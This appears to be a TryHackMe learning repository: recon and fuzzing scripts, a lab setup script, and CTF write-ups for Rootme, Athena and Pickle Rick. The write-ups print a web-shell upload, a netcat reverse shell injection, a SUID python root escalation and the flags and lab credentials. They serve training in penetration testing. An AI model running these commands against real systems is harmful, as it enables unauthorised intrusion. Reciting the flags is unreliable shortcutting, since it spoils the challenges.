├── Scripts ├── victim.sh ├── scan.sh ├── fuzz │ ├── fuzzer_2.js │ ├── fuzzer.js │ └── fuzzer_3.js └── setup.sh ├── Writeups ├── rootme.md ├── athena.md └── pickle-rick.md └── README.md /Scripts/victim.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | if [ "$#" -ne 3 ]; then 5 | echo "Usage: $0 " 6 | exit 1 7 | fi 8 | 9 | ip="$1" 10 | domain="$2" 11 | platform="$3" 12 | hosts_file="/etc/hosts" 13 | zshrc_file="$HOME/.zshrc" 14 | 15 | if grep -q "$domain" "$hosts_file"; then 16 | sudo sed -i "/$domain/d" "$hosts_file" 17 | fi 18 | 19 | platform_section=$(grep -nE "# ====== $platform ======" "$hosts_file" | cut -d':' -f1) 20 | if [ -n "$platform_section" ]; then 21 | sudo sed -i "${platform_section}a $ip $domain" "$hosts_file" 22 | else 23 | echo -e "\n# ====== $platform ======" | sudo tee -a "$hosts_file" 24 | echo "$ip $domain" | sudo tee -a "$hosts_file" 25 | fi 26 | 27 | if grep -q "export VMIP=" "$zshrc_file"; then 28 | sed -i "/export VMIP=/d" "$zshrc_file" 29 | fi 30 | 31 | echo "export VMIP=\"$ip\"" >> "$zshrc_file" 32 | echo "Entry added/updated in /etc/hosts under platform $platform:" 33 | grep "$domain" "$hosts_file" 34 | echo "VMIP variable updated in $zshrc_file:" 35 | grep "export VMIP=" "$zshrc_file" 36 | -------------------------------------------------------------------------------- /Scripts/scan.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [ "$#" -ne 2 ]; then 4 | echo "Usage: $0 " 5 | exit 1 6 | fi 7 | 8 | 9 | 10 | target="$1" 11 | output_location="$2" 12 | echo "Scanning ports on $target..." 13 | results=$(sudo nmap -p- --min-rate 10000 -Pn -vv -oG "$output_location" "$target" 2>&1) 14 | 15 | if [ $? -eq 0 ]; then 16 | open_ports=$(echo "$results" | grep -oP '\d+/open' | cut -d'/' -f1) 17 | closed_ports=$(echo "$results" | grep -oP '\d+/closed' | cut -d'/' -f1) 18 | filtered_ports=$(echo "$results" | grep -oP '\d+/filtered' | cut -d'/' -f1) 19 | 20 | printf "---------------------------------- %s ------------------------------\n" "$target" 21 | printf "| Open | Closed | Filtered |\n" 22 | printf "| %-6s | %-6s | %-8s |\n" "$open_ports" "$closed_ports" "$filtered_ports" 23 | printf "--------------------------------------------\n" 24 | 25 | echo "Scan results saved to: $output_location" 26 | else 27 | echo "Error: Failed to run nmap. Please make sure it is installed and try again." 28 | fi 29 | -------------------------------------------------------------------------------- /Scripts/fuzz/fuzzer_2.js: -------------------------------------------------------------------------------- 1 | 2 | // FUZZ script writen by Trevohack 3 | // node fuzzer.js http://trevohack.com/ATTACK /usr/share/words.txt 4 | 5 | const fs = require('fs').promises; 6 | const axios = require('axios'); 7 | 8 | async function fuzzWithWordlist(baseURL, wordlistPath) { 9 | try { 10 | const data = await fs.readFile(wordlistPath, 'utf-8'); 11 | const words = data.split('\n'); 12 | 13 | const concurrency = 100; 14 | 15 | await Promise.all(words.map(async word => { 16 | try { 17 | const url = baseURL.replace("ATTACK", word); 18 | const response = await axios.get(url); 19 | if (response.status === 200) { 20 | console.log(`[+] Success: ${url} - Status: ${response.status}`); 21 | } 22 | } catch (error) { 23 | } 24 | })); 25 | 26 | } catch (error) { 27 | console.error(`[-] Error reading wordlist file: ${error.message}`); 28 | } 29 | } 30 | 31 | const args = process.argv.slice(2); 32 | if (args.length !== 2) { 33 | console.error("Usage: node fuzzer_2.js "); 34 | process.exit(1); 35 | } 36 | 37 | const baseURL = args[0]; 38 | const wordlistPath = args[1]; 39 | 40 | fuzzWithWordlist(baseURL, wordlistPath); 41 | -------------------------------------------------------------------------------- /Scripts/fuzz/fuzzer.js: -------------------------------------------------------------------------------- 1 | 2 | // FUZZ script writen by Trevohack 3 | // node fuzzer.js http://trevohack.com/ATTACK /usr/share/words.txt 4 | 5 | const fs = require('fs').promises; 6 | const axios = require('axios'); 7 | 8 | async function fuzzWithWordlist(baseURL, wordlistPath) { 9 | try { 10 | const data = await fs.readFile(wordlistPath, 'utf-8'); 11 | const words = data.split('\n'); 12 | 13 | const concurrency = 500; 14 | 15 | const processBatch = async (start, end) => { 16 | const batch = words.slice(start, end); 17 | await Promise.all(batch.map(async word => { 18 | try { 19 | const url = baseURL.replace("ATTACK", word); 20 | const response = await axios.get(url); 21 | if (response.status === 200) { 22 | console.log(`[+] Success: ${url} - Status: ${response.status}`); 23 | } 24 | } catch (error) { 25 | } 26 | })); 27 | }; 28 | 29 | let start = 0; 30 | while (start < words.length) { 31 | const end = Math.min(start + concurrency, words.length); 32 | await processBatch(start, end); 33 | start = end; 34 | } 35 | 36 | } catch (error) { 37 | console.error(`[-] Error reading wordlist file: ${error.message}`); 38 | } 39 | } 40 | 41 | 42 | const args = process.argv.slice(2); 43 | if (args.length !== 2) { 44 | console.error("Usage: node fuzzer.js "); 45 | process.exit(1); 46 | } 47 | 48 | const baseURL = args[0]; 49 | const wordlistPath = args[1]; 50 | 51 | fuzzWithWordlist(baseURL, wordlistPath); 52 | -------------------------------------------------------------------------------- /Scripts/fuzz/fuzzer_3.js: -------------------------------------------------------------------------------- 1 | 2 | // FUZZ script writen by Trevohack 3 | // node fuzzer.js http://trevohack.com/ATTACK /usr/share/words.txt parallel 4 | // node fuzzer.js http://trevohack.com/ATTACK /usr/share/words.txt sequential 5 | 6 | 7 | const fs = require('fs').promises; 8 | const axios = require('axios'); 9 | 10 | async function fuzzWithWordlist(baseURL, wordlistPath, mode) { 11 | try { 12 | const data = await fs.readFile(wordlistPath, 'utf-8'); 13 | const words = data.split('\n'); 14 | 15 | if (mode === 'parallel') { 16 | console.log("Using parallel fuzzing..."); 17 | await parallelFuzzing(baseURL, words); 18 | } else if (mode === 'sequential') { 19 | console.log("Using sequential fuzzing..."); 20 | await sequentialFuzzing(baseURL, words); 21 | } else { 22 | console.error("Invalid mode. Please choose either 'parallel' or 'sequential'."); 23 | } 24 | 25 | } catch (error) { 26 | console.error(`[-] Error reading wordlist file: ${error.message}`); 27 | } 28 | } 29 | 30 | async function sequentialFuzzing(baseURL, words) { 31 | for (const word of words) { 32 | try { 33 | const url = baseURL.replace("ATTACK", word); 34 | const response = await axios.get(url); 35 | if (response.status === 200) { 36 | console.log(`[+] Success: ${url} - Status: ${response.status}`); 37 | } 38 | } catch (error) { 39 | } 40 | } 41 | } 42 | 43 | async function parallelFuzzing(baseURL, words) { 44 | const concurrency = 1000; 45 | await Promise.all(words.map(async word => { 46 | try { 47 | const url = baseURL.replace("ATTACK", word); 48 | const response = await axios.get(url); 49 | if (response.status === 200) { 50 | console.log(`[+] Success: ${url} - Status: ${response.status}`); 51 | } 52 | } catch (error) { 53 | } 54 | })); 55 | } 56 | 57 | const args = process.argv.slice(2); 58 | if (args.length !== 3) { 59 | console.error("Usage: node fuzzer.js "); 60 | console.error("Mode: 'parallel' or 'sequential'"); 61 | process.exit(1); 62 | } 63 | 64 | const baseURL = args[0]; 65 | const wordlistPath = args[1]; 66 | const mode = args[2]; 67 | 68 | fuzzWithWordlist(baseURL, wordlistPath, mode); 69 | -------------------------------------------------------------------------------- /Writeups/rootme.md: -------------------------------------------------------------------------------- 1 | # Rootme 2 | 3 | ![](https://tryhackme-images.s3.amazonaws.com/room-icons/11d59cb34397e986062eb515f4d32421.png) 4 | 5 | ## Scanning 6 | 7 | ```bash 8 | nmap -T4 -A -p- MACHINE_IP 9 | Nmap scan report for MACHINE_IP 10 | Host is up (0.15s latency). 11 | Not shown: 65464 closed ports, 69 filtered ports 12 | PORT STATE SERVICE VERSION 13 | 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 14 | | ssh-hostkey: 15 | | 2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA) 16 | | 256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA) 17 | |_ 256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519) 18 | 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 19 | | http-cookie-flags: 20 | | /: 21 | | PHPSESSID: 22 | |_ httponly flag not set 23 | |_http-server-header: Apache/2.4.29 (Ubuntu) 24 | |_http-title: HackIT - Home 25 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 26 | ``` 27 | 28 | ## Dir bruteforce: 29 | 30 | 31 | ```bash 32 | gobuster dir -u MACHINE_IP -w /usr/share/wordlists/dirb/common.txt 33 | =============================================================== 34 | 35 | /.hta (Status: 403) 36 | /.htpasswd (Status: 403) 37 | /.htaccess (Status: 403) 38 | /css (Status: 301) 39 | /index.php (Status: 200) 40 | /js (Status: 301) 41 | /panel (Status: 301) 42 | /server-status (Status: 403) 43 | /uploads (Status: 301) 44 | ``` 45 | 46 | ## Explotation 47 | 48 | 49 | * `http://MACHINE_IP/panel/`` has a file upload, i already know what im gonna do. 50 | 51 | * Lets listen on our port `nc -lvnp 4444`, lets upload our shell `shell.phtml` 52 | 53 | * Get a shell by: `curl http://MACHINE_IP/uploads/shell.phtml` 54 | 55 | * Find our flag - `find | grep "user.txt" 2>/dev/null` 56 | 57 | ## Privilege Escalation 58 | 59 | `find / -user root -perm /4000` 60 | 61 | ```bash 62 | /usr/bin/newuidmap 63 | /usr/bin/newgidmap 64 | /usr/bin/chsh 65 | /usr/bin/python 66 | /usr/bin/chfn 67 | /usr/bin/gpasswd 68 | /usr/bin/sudo 69 | /usr/bin/newgrp 70 | /usr/bin/passwd 71 | /usr/bin/pkexec 72 | /bin/mount 73 | /bin/su 74 | /bin/fusermount 75 | /bin/ping 76 | /bin/umount 77 | /usr/bin/python this one looks interesting 78 | ``` 79 | 80 | * Since, `/usr/bin/python` has the suid bit we can promote our shell to root! 81 | 82 | ```bash 83 | python -c 'import os; os.execl("/bin/sh", "sh", "-p")' 84 | ``` 85 | 86 | ```bash 87 | whoami 88 | root 89 | 90 | cd /root 91 | ``` 92 | 93 | ## Flags 94 | 95 |
96 | user.txt 97 | 98 | ```bash 99 | THM{y0u_g0t_a_sh3l} 100 | ``` 101 | 102 |
103 | 104 |
105 | root.txt 106 | 107 | ```bash 108 | THM{pr1v1l3g3_3sc4l4t10n} 109 | ``` 110 | 111 |
112 | 113 | ## Thank You! 114 | -------------------------------------------------------------------------------- /Writeups/athena.md: -------------------------------------------------------------------------------- 1 | 2 | ![](https://tryhackme-images.s3.amazonaws.com/room-icons/53d3c28c1af197142685ceb238d5ce3c.png) 3 | 4 | ## Nmap Scan 5 | 6 | ```bash 7 | PORT STATE SERVICE REASON 8 | 22/tcp open ssh syn-ack ttl 63 9 | 80/tcp open http syn-ack ttl 63 10 | 139/tcp open netbios-ssn syn-ack ttl 63 11 | 445/tcp open microsoft-ds syn-ack ttl 63 12 | ``` 13 | 14 | ## Web Pwn 15 | 16 | * On port 80 => there is a web page. 17 | 18 | * SMB has anonymous login there will be a file containg a hidden direcotory in the web page. `/myrouterpanel` 19 | 20 | ```bash 21 | > smbclient \\\\$VMIP\\public 22 | Password for [WORKGROUP\trevohack]: 23 | Anonymous login successful 24 | Try "help" to get a list of possible commands. 25 | smb: \> ls 26 | . D 0 Mon Apr 17 06:24:43 2023 27 | .. D 0 Mon Apr 17 06:24:05 2023 28 | msg_for_administrator.txt N 253 Mon Apr 17 00:29:44 2023 29 | 30 | 19947120 blocks of size 1024. 9693196 blocks available 31 | smb: \> get msg_for_administrator.txt 32 | getting file \msg_for_administrator.txt of size 253 as msg_for_administrator.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec) 33 | smb: \> 34 | ``` 35 | 36 | * `/myrouterpanel` is vulnerable to RCE `$(nc -e /bin/bash)` will get a reverse shell as `www-data` 37 | 38 | ## Priv Escalate to Athena 39 | 40 | * From there, a `backup.sh` file is available at `/usr/share/backup` which runs recursively if you look at `pspy`. 41 | 42 | * `ls -la` shows this 43 | 44 | ```bash 45 | -rwxr-xr-x 1 www-data athena 310 Sep 16 19:01 backup.sh 46 | ``` 47 | 48 | * Injecting a reverse shell may give a shell as `athena` 49 | 50 | ```bash 51 | > nc -nvlp 9090 52 | Listening on 0.0.0.0 9090 53 | Connection received on 10.10.236.162 41090 54 | bash: no job control in this shell 55 | athena@routerpanel:/$ whoami 56 | athena 57 | ``` 58 | 59 | ## Priv Escalate to root 60 | 61 | * On athena `sudo -l -l` reveals that `/mnt/.../secret/venom.ko` can be loaded to the kernel 62 | 63 | 64 | ```bash 65 | athena@routerpanel:/$ sudo -l -l 66 | Matching Defaults entries for athena on routerpanel: 67 | env_reset, mail_badpass, 68 | secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin 69 | User athena may run the following commands on routerpanel: 70 | Sudoers entry: 71 | RunAsUsers: root 72 | Options: !authenticate 73 | Commands: 74 | /usr/sbin/insmod /mnt/.../secret/venom.ko 75 | ``` 76 | 77 | * USE Ghidra: to reverse the venom.ko file 78 | 79 | ![](https://i.postimg.cc/RFR6NDRs/reverse.png) 80 | 81 | ![](https://i.postimg.cc/qRjqkCJW/reversing.png) 82 | 83 | * After reversing, the `give_root` function may work like this `kill -57 `, later on the `id` command reveals that you have root access. 84 | 85 | # Thank You!! 86 | -------------------------------------------------------------------------------- /Scripts/setup.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | # Trevohack's TryHackMe Lab Setup 5 | # curl -O https://raw.githubusercontent.com/Trevohack/TryHackMe-Zero-To-Hero/main/Scripts/setup.sh && chmod +x setup.sh && ./setup.sh 6 | 7 | sudo mkdir -p /opt/utils/ 8 | sudo mkdir -p /opt/wordlists/ 9 | sudo mkdir -p ~/THM/ 10 | sudo mkdir -p ~/THM/Writeups/ 11 | sudo mkdir -p ~/THM/VPN/ 12 | 13 | install_package() { 14 | package_name=$1 15 | echo "Installing $package_name..." 16 | sudo apt-get install -y $package_name 17 | } 18 | 19 | allow_port() { 20 | port=$1 21 | echo "Allowing incoming traffic on port $port..." 22 | sudo ufw allow $port 23 | } 24 | sudo ufw enable 25 | allow_port 1337 # Adjust to your specific needs 26 | allow_port 4444 # Adjust to your specific needs 27 | allow_port 8000 # Adjust to your specific needs 28 | allow_port 9001 # Adjust to your specific needs 29 | allow_port 31337 # Adjust to your specific needs 30 | 31 | echo "Allowing ICMP (ping)..." 32 | sudo ufw allow icmp 33 | echo "Allowing all outgoing connections..." 34 | sudo ufw default allow outgoing 35 | echo "CTF-friendly firewall configuration complete!" 36 | 37 | sudo mkdir -p /opt/utils/ 38 | sudo mkdir -p /opt/wordlists/ 39 | sudo mkdir -p ~/THM/ 40 | sudo mkdir -p ~/THM/Writeups/ 41 | sudo mkdir -p ~/THM/VPN/ 42 | 43 | install_package "nmap" 44 | install_package "metasploit-framework" 45 | install_package "httpie" 46 | install_package "lynx" 47 | 48 | echo "Installing rustscan..." 49 | cd /opt/utils 50 | wget https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb 51 | sudo dpkg -i rustscan_2.0.1_amd64.deb 52 | rm rustscan_2.0.1_amd64.deb 53 | 54 | echo "Installing pspy64..." 55 | cd /opt/utils 56 | wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64 57 | chmod +x pspy64 58 | 59 | echo "Downloading linpeas.sh..." 60 | cd /opt/utils 61 | wget https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/linpeas.sh 62 | chmod +x linpeas.sh 63 | 64 | echo "Downloading linux-exploit-suggestor.sh..." 65 | cd /opt/utils 66 | wget https://github.com/mzet-/linux-exploit-suggester/raw/master/linux-exploit-suggester.sh 67 | chmod +x linux-exploit-suggester.sh 68 | 69 | echo "Downloading wordlists..." 70 | cd /opt/wordlists 71 | wget https://github.com/assetnote/commonspeak2-wordlists/raw/master/subdomains/subdomains.txt 72 | wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Leaked-Databases/rockyou-75.txt 73 | 74 | 75 | echo 'export LHOST="$(ip -o -4 addr show tun0 | awk '\''{print $4}'\'' | cut -d "/" -f 1)"' >> $HOME/.zshrc 76 | echo 'export ROCKYOU="/opt/wordlists/rockyou-75.txt"' >> $HOME/.zshrc 77 | echo 'alias vpn="sudo openvpn ~/THM/VPN/> $HOME/.zshrc 78 | 79 | curl https://raw.githubusercontent.com/Trevohack/TryHackMe-Zero-To-Hero/main/Scripts/victim.sh -O /opt/utils/victim.sh && chmod +x /opt/utils/victim.sh && cp /opt/utils/victim.sh /usr/bin/victim 80 | curl https://raw.githubusercontent.com/Trevohack/TryHackMe-Zero-To-Hero/main/Scripts/scan.sh -O /opt/utils/scan.sh && chmod +x /opt/utils/scan.sh && cp /opt/utils/scan.sh /usr/bin/scanhost 81 | 82 | echo "Installation complete!" 83 | 84 | -------------------------------------------------------------------------------- /Writeups/pickle-rick.md: -------------------------------------------------------------------------------- 1 | 2 | # Pickle Rick - TryHackMe 3 | 4 | ```bash 5 | ❯ victim -i '10.10.84.218' 6 | Saved! 7 | ``` 8 | 9 | ## Nmap Scans 10 | 11 | ``` 12 | Starting Nmap 7.80 ( https://nmap.org ) at 2023-10-05 15:35 +0530 13 | Initiating Parallel DNS resolution of 1 host. at 15:35 14 | Completed Parallel DNS resolution of 1 host. at 15:35, 0.00s elapsed 15 | Initiating SYN Stealth Scan at 15:35 16 | Scanning 10.10.84.218 (10.10.84.218) [65535 ports] 17 | Discovered open port 80/tcp on 10.10.84.218 18 | Discovered open port 22/tcp on 10.10.84.218 19 | Completed SYN Stealth Scan at 15:35, 8.97s elapsed (65535 total ports) 20 | Nmap scan report for 10.10.84.218 (10.10.84.218) 21 | 22 | PORT STATE SERVICE REASON 23 | 22/tcp open ssh syn-ack ttl 63 24 | 80/tcp open http syn-ack ttl 63 25 | ``` 26 | 27 | * Open ports: 22 ssh , 80 http 28 | 29 | ## Web Enumeration 30 | 31 | ![webpage](https://i.postimg.cc/nLGcQFR1/webpage.png) 32 | 33 | * Dirsearch results 34 | 35 | ```bash 36 | ❯ dirsearch -u http://$VMIP/ -w /opt/wordlists/big.txt -e .php 200 37 | _|. _ _ _ _ _ _|_ v0.4.2 38 | (_||| _) (/_(_|| (_| ) 39 | 40 | Extensions: php | HTTP method: GET | Threads: 30 | Wordlist size: 20477 41 | 42 | Output File: /home/trevohack/.dirsearch/reports/10.10.84.218/-_23-10-05_16-01-07.txt 43 | 44 | Error Log: /home/trevohack/.dirsearch/logs/errors-23-10-05_16-01-07.log 45 | 46 | Target: http://10.10.84.218/ 47 | 48 | [16:01:08] Starting: 49 | [16:01:13] 200 - 882B - /login.php 50 | [16:01:30] 301 - 313B - /assets -> http://10.10.84.218/assets/ 51 | [16:03:33] 200 - 17B - /robots.txt 52 | [16:03:41] 403 - 300B - /server-status 53 | ``` 54 | 55 | * Found a login panel `/login.php` 56 | 57 | * `robots.txt` reveals some text `Wubbalubbadubdub` 58 | 59 | * The `html` source of the main page reveals a username 60 | 61 | ```html 62 | 69 | ``` 70 | 71 | * Login to the site using the creds `R1ckRul3s:Wubbalubbadubdub` 72 | 73 | ![logon](https://i.postimg.cc/g08LtbMw/login.png) 74 | 75 | * You will be presented a command panel where you could inject commands to the server. 76 | 77 | ![command](https://i.postimg.cc/mhf0wMh1/command-panel.png) 78 | 79 | ## Getting a shell 80 | 81 | 82 | * Run a bash rev shell on the server to obtain a shell as `www-data` 83 | 84 | ![shell-got](https://i.postimg.cc/26BY7CTJ/shell.png) 85 | 86 | ### Ingredients 87 | 88 | ```bash 89 | $ cat /var/www/html/Sup3rS3cretPickl3Ingred.txt 90 | mr. meeseek hair 91 | ``` 92 | 93 | * Exploring the files you may find the second ingredient easily 94 | 95 | ```bash 96 | cat '/home/rick/second ingredients' 97 | 1 jerry tear 98 | ``` 99 | 100 | ## Privilege Escalation 101 | 102 | * Running `sudo -l -l` shows that `www-data` can run anything without password 103 | 104 | ```bash 105 | www-data@ip-10-10-84-218:/home/rick$ sudo -l -l 106 | sudo -l -l 107 | Matching Defaults entries for www-data on 108 | ip-10-10-84-218.eu-west-1.compute.internal: 109 | env_reset, mail_badpass, 110 | secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin 111 | 112 | User www-data may run the following commands on 113 | ip-10-10-84-218.eu-west-1.compute.internal: 114 | 115 | Sudoers entry: 116 | RunAsUsers: ALL 117 | Options: !authenticate 118 | Commands: 119 | ALL 120 | ``` 121 | 122 | ```bash 123 | www-data@ip-10-10-84-218:/home/rick$ sudo su - root 124 | sudo su - root 125 | mesg: ttyname failed: Inappropriate ioctl for device 126 | id 127 | uid=0(root) gid=0(root) groups=0(root) 128 | cd /root 129 | ls 130 | 3rd.txt 131 | snap 132 | cat 3rd.txt 133 | 3rd ingredients: fleeb juice 134 | ``` 135 | 136 | ## CTF Done 137 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 |
4 | 5 |
6 | 7 |

TryHackMe - Hackers Learning Path

8 | 9 | 10 | * Below is a series of rooms/machines in TryHackMe for beginners to cyber security to learn and practice. 11 | 12 | ## Ultimate Setup 13 | 14 | * Configure environment in one line! 15 | 16 | ```bash 17 | trevohack@anonymous $ curl -O https://raw.githubusercontent.com/Trevohack/TryHackMe-Zero-To-Hero/main/Scripts/setup.sh && chmod +x setup.sh && ./setup.sh 18 | ``` 19 | 20 | ## Beginner Level Theory - [ 0x1 - 0x6 ] 21 | 22 | - [Tutorial](https://tryhackme.com/room/tutorial) 23 | - [Beginner](https://tryhackme.com/room/beginnerpathintro) 24 | 25 | ### Linux & Bash 26 | 27 | - [Linux](https://tryhackme.com/room/linuxfundamentalspart1) 28 | - [Linux 2](https://tryhackme.com/room/linuxfundamentalspart2) 29 | - [Linux 3](https://tryhackme.com/room/linuxfundamentalspart3) 30 | - [Bash Scripting](https://tryhackme.com/room/bashscripting) 31 | - [Linux Modules](https://tryhackme.com/room/linuxmodules) 32 | 33 | 34 | ### Acquainting yourself with tools 35 | 36 | > **Acquainting** yourself with tools in cybersecurity involves learning how to effectively use software, hardware, and techniques to secure digital systems and networks against cyber threats. 37 | 38 | #### Nmap & Networking 39 | 40 | > Nmap, short for "Network Mapper," is a powerful network scanning and exploration tool used in cybersecurity. It's designed to discover hosts, services, and vulnerabilities within a computer network. Nmap employs various scanning techniques, like TCP, UDP, SYN, and ICMP scans, to identify open ports, services running on those ports, and operating systems. This information is crucial for assessing network security, finding potential entry points, and strengthening defenses against potential threats. 41 | 42 | - [Nmap 1](https://tryhackme.com/room/nmap01) 43 | - [Nmap 2](https://tryhackme.com/room/nmap02) 44 | - [Nmap 3](https://tryhackme.com/room/nmap03) 45 | - [Nmap 4](https://tryhackme.com/room/nmap04) 46 | - [Further Nmap](https://tryhackme.com/room/furthernmap) 47 | - [Networking](https://tryhackme.com/jr/introtonetworking) 48 | - [Networking Services](https://tryhackme.com/jr/networkservices) 49 | - [Protocols And Servers](https://tryhackme.com/jr/protocolsandservers) 50 | - [Protocols And Servers 2](https://tryhackme.com/jr/protocolsandservers2) 51 | 52 | #### Tmux: Terminal Configuration 53 | 54 | - [Tmux](https://tryhackme.com/room/rptmux) 55 | - [Tmux 2](https://tryhackme.com/room/tmuxremux) 56 | 57 | #### Burp Suite 58 | 59 | > Burp Suite: Essential tool for web app security testing, uncovering vulnerabilities and aiding in their resolution. 60 | 61 | - [Burp: The Basics](https://tryhackme.com/jr/burpsuitebasics) 62 | - [Burp: Repeater](https://tryhackme.com/jr/burpsuiterepeater) 63 | - [Burp: Intruder](https://tryhackme.com/jr/burpsuiterepeater) 64 | - [Burp: Other Modules](https://tryhackme.com/jr/burpsuiteom) 65 | 66 | #### Metasploit 67 | 68 | > Metasploit is a leading penetration testing tool for identifying and testing system vulnerabilities, widely used by cybersecurity professionals. 69 | 70 | - [Metasploit: Introduction](https://tryhackme.com/jr/metasploitintro) 71 | - [Metasploit: Exploitation](https://tryhackme.com/jr/metasploitexploitation) 72 | - [Metasploit: Meterpreter](https://tryhackme.com/jr/meterpreter) 73 | 74 | ### Web Penetration 75 | 76 | > Web penetration testing: Assessing web app security by simulating attacks to uncover and address vulnerabilities. 77 | 78 | - [Walking An Application](https://tryhackme.com/jr/walkinganapplication) 79 | - [Content Discovery](https://tryhackme.com/jr/contentdiscovery) 80 | - [Subdomain Enumeration](https://tryhackme.com/jr/subdomainenumeration) 81 | - [Authentication Bypass](https://tryhackme.com/jr/authenticationbypass) 82 | - [IDOR](https://tryhackme.com/jr/idor) 83 | - [XSS](https://tryhackme.com/jr/xss) 84 | - [Command Injection](https://tryhackme.com/jr/oscommandinjection) 85 | - [SSRF](https://tryhackme.com/jr/ssrfqi) 86 | - [File Inclusion](https://tryhackme.com/jr/fileinc) 87 | - [SQL Injection](https://tryhackme.com/jr/sqlinjectionlm) 88 | 89 | ### Vulnerability Research 90 | 91 | - [Vulns](https://tryhackme.com/jr/vulnerabilities101) 92 | - [Exploitation](https://tryhackme.com/jr/exploitingavulnerabilityv2) 93 | - [Vulnerability Capstone](https://tryhackme.com/jr/vulnerabilitycapstone) 94 | 95 | ### Priv Escalation 96 | 97 | > Privilege escalation (priv esc) is the act of gaining higher levels of access or privileges than initially granted to a user or system. It involves exploiting vulnerabilities to elevate privileges, granting unauthorized access to resources or actions. This can be a critical step for attackers to gain control over a system, making it a crucial focus in security assessments to prevent unauthorized escalation of privileges. 98 | 99 | - [Linux Priv Esc](https://tryhackme.com/jr/linprivesc) 100 | - [Windows Priv Esc](https://tryhackme.com/jr/windowsprivesc20) 101 | 102 | ### Other Essentials 103 | 104 | #### Python 105 | 106 | - [Python 1](https://tryhackme.com/room/pythonbasics) 107 | - [Python 2](https://tryhackme.com/room/pythonforcybersecurity) 108 | - [Flask](https://tryhackme.com/room/flask) 109 | 110 | #### Poc Scripting 111 | 112 | - [Poc Writing](https://tryhackme.com/room/intropocscripting) 113 | 114 | #### Javascript 115 | 116 | - [Javascript Basics](https://tryhackme.com/room/javascriptbasics) 117 | - [Jason](https://tryhackme.com/room/jason) 118 | 119 | 120 | 121 | ## Pro Level - [ 0x7 - 0xD ] 122 | 123 | ### Active Directory 124 | 125 | - [Enumerating AD](https://tryhackme.com/room/adenumeration) 126 | - [Breaching AD](https://tryhackme.com/room/breachingad) 127 | - [Lateral Movement & Pivoting](https://tryhackme.com/room/lateralmovementandpivoting) 128 | - [Exploiting AD](https://tryhackme.com/room/exploitingad) 129 | - [Persisting AD](https://tryhackme.com/room/persistingad) 130 | - [Holo](https://tryhackme.com/room/hololive) 131 | 132 | ### Buffer Overflow Exploitation 133 | 134 | - [Buffer Overflow Prep](https://tryhackme.com/jr/bufferoverflowprep) 135 | - [Brainstorm](https://tryhackme.com/jr/brainstorm) 136 | 137 | > You could get to this level or position after completing the above theory content and starting to practice through CTF challenges. 138 | 139 | 140 | ### CTF challenges 141 | 142 | > For the machines/rooms mentioned below writeups will be added soon! 143 | 144 | #### Easy 145 | 146 | - [X] [ Rootme](https://tryhackme.com/room/rrootme) 147 | - [ ] [ Ignite](https://tryhackme.com/room/ignite) 148 | - [X] [ Pickle Rick](https://tryhackme.com/room/picklerick) 149 | - [ ] [ Cyborg](https://tryhackme.com/room/cyborgt8) 150 | - [ ] [ Tomghost](https://tryhackme.com/room/tomghost) 151 | - [ ] [ Source](https://tryhackme.com/room/source) 152 | - [ ] [ Res](https://tryhackme.com/room/res) 153 | - [ ] [ Lazy Admin](https://tryhackme.com/room/lazyadmin) 154 | - [ ] [ Overpass](https://tryhackme.com/room/overpass) 155 | - [ ] [ Startup](https://tryhackme.com/room/startup) 156 | - [ ] [ Wgel CTF](https://tryhackme.com/room/wgelctf) 157 | - [ ] [ Gaming Server](https://tryhackme.com/room/gamingserver) 158 | 159 | #### Medium 160 | 161 | - [X] [ Athena](https://tryhackme.com/room/4th3n4) 162 | - [ ] [ Wonderland](https://tryhackme.com/room/wonderland) 163 | - [ ] [ Mr Robot CTF](https://tryhackme.com/room/mrrobot) 164 | - [ ] [ dogcat](https://tryhackme.com/room/relevant) 165 | - [ ] [ The Marketplace](https://tryhackme.com/room/marketplace) 166 | - [ ] [ GoldenEye](https://tryhackme.com/room/goldeneye) 167 | 168 | #### Hard 169 | 170 | - [ ] [ Internal](https://tryhackme.com/room/internal) 171 | - [ ] [ Year of the fox](https://tryhackme.com/room/yotf) 172 | - [ ] [ Retro](https://tryhackme.com/room/retro) 173 | - [ ] [ Ra](https://tryhackme.com/room/ra) 174 | 175 | 176 | ``` 177 | Congrats! 🥳 If you have done all the rooms mentioned here, you are officially a penetration tester. You can go ahead in your career with other resources and platforms. 178 | ``` 179 | --------------------------------------------------------------------------------